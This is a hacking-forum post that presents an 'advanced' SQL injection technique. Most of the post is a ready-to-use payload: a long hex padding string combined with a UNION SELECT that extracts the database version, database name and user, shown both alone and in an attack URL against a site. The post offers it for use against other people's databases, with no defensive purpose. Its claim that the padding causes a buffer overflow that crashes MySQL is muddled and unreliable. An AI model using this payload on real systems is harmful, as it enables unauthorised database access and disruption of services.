Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Advanced SQL Injection: Buffer Overflows filter_list
Author
Message
Advanced SQL Injection: Buffer Overflows #1
Hello friendz...
today, i will show my own technique to fuck mysql databases...

today, i will show u how to create buffer overflows when you are injecting a site, with this technique, we can easily deliver buffer overflows to the site...

example:

we will use "+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141 414141
414141414141….)+union+select+1,2,version(),databas e(),user(),6,7,8,9,10--"

http://site.com/aaaa/agd.php?id=-1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141 414141
414141414141….)+union+select+1,2,version(),databas e(),user(),6,7,8,9,10--


------------the vulnerability------------

when sending the "select" parameter with overdose of queries, the mysql database will not respond, since we also added some other queries on the parameter-side, and b00m. the mysql server has crashed!


that is it Biggrin =))






Messages In This Thread
Advanced SQL Injection: Buffer Overflows - by Crypton - 01-22-2013, 11:42 PM